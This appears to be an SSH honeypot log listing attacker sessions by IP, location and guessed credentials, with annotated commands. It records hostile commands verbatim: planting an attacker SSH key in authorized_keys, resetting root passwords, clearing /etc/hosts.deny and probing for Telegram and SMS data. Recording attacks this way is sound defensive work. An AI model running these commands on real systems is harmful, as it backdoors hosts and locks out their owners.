$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "root\nlsL8iiMCg6rD\nlsL8iiMCg6rD"|passwd|bash
$ echo "root\nlsL8iiMCg6rD\nlsL8iiMCg6rD\n"|passwd
$ echo -e "admin9\n1OhseLBvQafZ\n1OhseLBvQafZ"|passwd|bash
$ echo "admin9\n1OhseLBvQafZ\n1OhseLBvQafZ\n"|passwd
🎭 cipher_root_103 (183.182.125.142) β€” Vientiane, Laos Β· 2 sessions Β· 40 cmds
2026-05-10 02:40 EDT Β· as user/112233, user2/root
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "root\nvB0DbHTUNNpk\nvB0DbHTUNNpk"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "root\nvB0DbHTUNNpk\nvB0DbHTUNNpk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "112233\nl9yhoCEsWLO8\nl9yhoCEsWLO8"|passwd|bash
$ echo "112233\nl9yhoCEsWLO8\nl9yhoCEsWLO8\n"|passwd
🎭 shadow_root_100 (181.65.191.218) β€” Lambayeque, Peru Β· 3 sessions Β· 60 cmds
2026-05-10 02:26 EDT Β· as admin9/admin9, user/112233, user2/root
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "112233\nkwbyCenbh6Da\nkwbyCenbh6Da"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "112233\nkwbyCenbh6Da\nkwbyCenbh6Da\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "admin9\nB41vL43CX9OX\nB41vL43CX9OX"|passwd|bash
$ echo "admin9\nB41vL43CX9OX\nB41vL43CX9OX\n"|passwd
$ echo -e "root\neMErlU6s1njl\neMErlU6s1njl"|passwd|bash
$ echo "root\neMErlU6s1njl\neMErlU6s1njl\n"|passwd
🎭 burger_root_63 (209.99.190.200) β€” San Francisco, United States Β· 1 session Β· 19 cmds
2026-05-10 01:41 EDT Β· as userroot/userroot
execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:afo8ab56kijR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_39 (61.145.190.218) β€” Zhuhai, China Β· 1 session Β· 1 cmd
2026-05-10 01:15 EDT Β· as root/Cryptolendify!123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lantern_root_40 (180.138.194.82) β€” Liuchow, China Β· 1 session Β· 20 cmds
2026-05-10 00:42 EDT Β· as guest/administrator123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "administrator123\njLMd4UTQJK7w\njLMd4UTQJK7w"|passwd|bash
$ Enter new UNIX password:
$ echo "administrator123\njLMd4UTQJK7w\njLMd4UTQJK7w\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 gouda_sol_2 (192.109.200.18) β€” Eygelshoven, The Netherlands Β· 4 sessions Β· 4 cmds
2026-05-07 13:25 EDT Β· as admin/admin, hadoop/hadoop, helpdesk/helpdesk
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—4
🎭 hanbok_root_20 (175.196.135.187) β€” Ansan-si, South Korea Β· 1 session Β· 9 cmds
2026-05-09 22:34 EDT Β· as root/root
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 cowboy_root_58 (118.186.7.10) β€” Santa Clara, United States Β· 1 session Β· 20 cmds
2026-05-09 21:05 EDT Β· as ec2-user/ec2
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ec2\n3LHys1tro8bZ\n3LHys1tro8bZ"|passwd|bash
$ Enter new UNIX password:
$ echo "ec2\n3LHys1tro8bZ\n3LHys1tro8bZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_root_17 (221.139.88.149) β€” Gwanak-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-09 19:06 EDT Β· as ftpadmin/123
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nfqO4MJFzexBF\nfqO4MJFzexBF"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nfqO4MJFzexBF\nfqO4MJFzexBF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root (125.21.59.218) β€” Haryāna, India Β· 3 sessions Β· 59 cmds
2026-05-03 23:12 EDT Β· as admin/1, root/Pa$$w0rd123!, user/aa123456
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:0owL3TJ4z5Ox"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "aa123456\no10dwOR8pE9z\no10dwOR8pE9z"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "aa123456\no10dwOR8pE9z\no10dwOR8pE9z\n"|passwd
$ echo -e "1\n3fyyZfeQSqXL\n3fyyZfeQSqXL"|passwd|bash
$ echo "1\n3fyyZfeQSqXL\n3fyyZfeQSqXL\n"|passwd
🎭 bear_root_6 (185.16.215.181) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-05-09 17:23 EDT Β· as root/root1234!@#$
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:IvczsS8u4OO2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_107 (103.142.26.46) β€” QuαΊ­n TΓ’n PhΓΊ, Vietnam Β· 1 session Β· 20 cmds
2026-05-09 17:19 EDT Β· as dbuser/dbuser123
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dbuser123\np4WlfOiUmrDG\np4WlfOiUmrDG"|passwd|bash
$ Enter new UNIX password:
$ echo "dbuser123\np4WlfOiUmrDG\np4WlfOiUmrDG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_108 (103.210.22.17) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-09 16:11 EDT Β· as deploy/Password1
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Password1\ngWCdhQP1x6ui\ngWCdhQP1x6ui"|passwd|bash
$ Enter new UNIX password:
$ echo "Password1\ngWCdhQP1x6ui\ngWCdhQP1x6ui\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_41 (114.112.96.82) β€” Beijing, China Β· 1 session Β· 2 cmds
2026-05-09 11:53 EDT Β· as ts3/123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 rogue_root_117 (185.71.233.73) β€” HoΕ™ovice, Czechia Β· 11 sessions Β· 39 cmds
2026-05-09 07:06 EDT Β· as root/root
apt-get β†’ sudo β†’ root β†’ ? (repeated apt-get 11x)
$ apt-get update -y Γ—11
$ sudo apt-get update -y Γ—11
$ root Γ—11
$ ? Γ—2
$ Γ—4
🎭 wok_root_31 (39.175.52.70) β€” Hangzhou, China Β· 1 session Β· 1 cmd
2026-05-09 11:27 EDT Β· as root/h3c.com!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 burger_root_64 (65.181.123.181) β€” Dallas, United States Β· 1 session Β· 19 cmds
2026-05-09 10:37 EDT Β· as root/zhanghao
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:LIMPFdWgVLWJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 abba_root_6 (45.84.107.33) β€” Sundbyberg, Sweden Β· 1 session Β· 3 cmds
2026-05-09 08:28 EDT Β· as root/root
CPU profiling β†’ CPU profiling β†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778329703051465041" | sh // CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778329703051465041 // CPU profiling
$
🎭 panda_root_41 (122.224.205.42) β€” Hangzhou, China Β· 1 session Β· 1 cmd
2026-05-09 08:13 EDT Β· as ubuntu/cryptolendify@2022!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_17 (41.242.115.83) β€” Accra, Ghana Β· 2 sessions Β· 39 cmds
2026-05-04 11:14 EDT Β· as phptest/phptest, root/qwert!@#123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "phptest\nL1AjYCotWbY9\nL1AjYCotWbY9"|passwd|bash
$ Enter new UNIX password:
$ echo "phptest\nL1AjYCotWbY9\nL1AjYCotWbY9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
